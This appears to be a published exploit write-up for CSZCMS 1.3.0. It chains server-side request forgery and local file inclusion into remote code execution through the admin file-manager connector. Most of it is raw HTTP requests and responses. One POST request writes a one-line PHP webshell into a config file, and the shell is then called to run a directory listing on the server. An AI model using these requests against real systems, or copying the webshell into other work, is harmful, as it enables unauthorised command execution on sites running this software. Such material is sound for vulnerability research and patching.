# Title: CSZCMS V1.3.0 - SSRF To LFI To Rce # Author: Hejap Zairy # Date: 07.04.2022 # Vendor: https://sourceforge.net/projects/cszcms/files/install/ # Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # 1 - step inject ssrf # 2 - inject SSRF to LFI # 3 - Inject SSRF to LFI to RCE put webshell config #vulnerability Code php Needs more filtering commands ``` protected static $base64encodeSessionData = false; protected $commands = array( 'abort' => array('id' => true), 'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false), 'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false), 'chmod' => array('targets' => true, 'mode' => true), 'dim' => array('target' => true, 'substitute' => false), 'duplicate' => array('targets' => true, 'suffix' => false), 'editor' => array('name' => true, 'method' => true, 'args' => false), 'extract' => array('target' => true, 'mimes' => false, 'makedir' => false), 'file' => array('target' => true, 'download' => false, 'cpath' => false, 'onetime' => false), 'get' => array('target' => true, 'conv' => false), 'info' => array('targets' => true, 'compare' => false), 'ls' => array('target' => true, 'mimes' => false, 'intersect' => false), 'mkdir' => array('target' => true, 'name' => false, 'dirs' => false), 'mkfile' => array('target' => true, 'name' => true, 'mimes' => false), 'netmount' => array('protocol' => true, 'host' => true, 'path' => false, 'port' => false, 'user' => false, 'pass' => false, 'alias' => false, 'options' => false), 'open' => array('target' => false, 'tree' => false, 'init' => false, 'mimes' => false, 'compare' => false), 'parents' => array('target' => true, 'until' => false), 'paste' => array('dst' => true, 'targets' => true, 'cut' => false, 'mimes' => false, 'renames' => false, 'hashes' => false, 'suffix' => false), 'put' => array('target' => true, 'content' => '', 'mimes' => false, 'encoding' => false), 'rename' => array('target' => true, 'name' => true, 'mimes' => false, 'targets' => false, 'q' => false), 'resize' => array('target' => true, 'width' => false, 'height' => false, 'mode' => false, 'x' => false, 'y' => false, 'degree' => false, 'quality' => false, 'bg' => false), 'rm' => array('targets' => true), 'search' => array('q' => true, 'mimes' => false, 'target' => false, 'type' => false), 'size' => array('targets' => true), 'subdirs' => array('targets' => true), 'tmb' => array('targets' => true), 'tree' => array('target' => true), 'upload' => array('target' => true, 'FILES' => true, 'mimes' => false, 'html' => false, 'upload' => false, 'name' => false, 'upload_path' => false, 'chunk' => false, 'cid' => false, 'node' => false, 'renames' => false, 'hashes' => false, 'suffix' => false, 'mtime' => false, 'overwrite' => false, 'contentSaveId' => false), 'url' => array('target' => true, 'options' => false), 'zipdl' => array('targets' => true, 'download' => false) ); ``` [+] Payload GET #l1_MGRheS5waHA= base64 decode 0day.php #l3_Y3N6ZGVmYXVsdC9tYWluLnBocA base64 decode main.php ``` GET /cms/index.php/admin/filemanager/connector/?cmd=get&targets=http://127.0.0.1/cms/index.php/admin/filemanager/connector/?cmd=file&target=l1_MGRheS5waHA= HTTP/1.1 Host: 127.0.0.1 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=h0nht0te0u73bbvu8e12lt2bmvfbepfn Connection: close ``` #Status: CRITICAL #Response ``` {"content":"data:image\/png;base64,PD89YCRfR0VUWzUxNV1gPz4NCg=="} # decode base64 ``` # Requests ``` POST /cms/admin/filemanager/connector/ HTTP/1.1 Host: 127.0.0.1 Content-Length: 128 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1/cms/admin/filemanager Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed Connection: close cmd=put&target=l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA&encoding=UTF-8&content=%3C%3F%3D%60%24_GET%5B515%5D%60%3F%3E&reqid=18002b807a32 ``` #Response ``` HTTP/1.1 200 OK Date: Thu, 07 Apr 2022 06:31:19 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=3600, must-revalidate Pragma: no-cache Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Content-Length: 190 Connection: keep-alive, close Content-Type: application/json; charset=utf-8 {"changed":[{"isowner":false,"ts":1649313079,"mime":"text\/x-php","read":1,"write":1,"size":"17","hash":"l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA","name":"config_example.inc.php","phash":"l6_Lw"}]} ``` #webshell ``` GET /cms/config_example.inc.php?515=dir HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed Connection: close ``` #response ``` HTTP/1.1 200 OK Date: Thu, 07 Apr 2022 06:37:33 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Powered-By: PHP/7.4.27 Connection: keep-alive, close Cache-Control: max-age=3600, must-revalidate Content-Length: 1917 Content-Type: text/html; charset=UTF-8 Volume in drive C is OS Volume Serial Number is 2EF1-9DCA Directory of C:\xampp\htdocs\cms 04/07/2022 09:13 AM . 04/07/2022 02:23 AM .. 04/30/2019 05:29 PM 8,444 .htaccess 04/07/2022 09:13 AM .quarantine 04/07/2022 09:13 AM .tmb 04/07/2022 07:07 AM 8 127.0.0.1_csv_banner_mgt_20220407.csv 04/07/2022 07:14 AM 5,362 127.0.0.1_files_20220407.zip 04/07/2022 07:14 AM 54,888 127.0.0.1_photo_20220407.zip 04/07/2022 06:57 AM assets 04/09/2018 03:34 PM 479 cache.config.inc.php 11/29/2021 07:40 AM 4,733 CHANGELOG 04/07/2022 06:55 AM 696 config.inc.php 04/07/2022 09:37 AM 17 config_example.inc.php 08/07/2018 05:18 AM 4,075 CONTRIBUTING.md 04/21/2021 07:01 AM 151,259 corecss.css 04/21/2021 07:01 AM 378,086 corejs.js 04/07/2022 06:57 AM cszcms 06/28/2019 09:04 PM 166 devtoolsbar.config.inc.php 04/07/2022 06:55 AM 690 env.config.inc.php 04/07/2022 06:55 AM 269 htaccess.config.inc.php 06/28/2019 02:48 PM 11,526 index.php 04/07/2022 06:57 AM install 01/28/2020 06:40 AM 3,439 LICENSE.md 04/09/2018 03:35 PM 336 memcached.config.inc.php 04/09/2018 03:34 PM 1,297 nginx_example.com.conf 04/07/2022 09:13 AM photo 04/09/2021 09:52 AM 1,744 proxy.inc.php 11/11/2021 07:48 AM 1,868 README.md 04/09/2018 03:35 PM 496 redis.config.inc.php 11/11/2021 07:46 AM 520 SECURITY.md 04/07/2022 06:57 AM system 04/07/2022 09:13 AM templates 22 File(s) 630,398 bytes 10 Dir(s) 80,676,995,072 bytes free ``` # Description: the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials to Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce # Proof and Exploit: https://i.imgur.com/pzWjkXI.png https://i.imgur.com/xxjxnGk.png https://i.imgur.com/S1F7MaJ.png https://i.imgur.com/BwWTfYU.png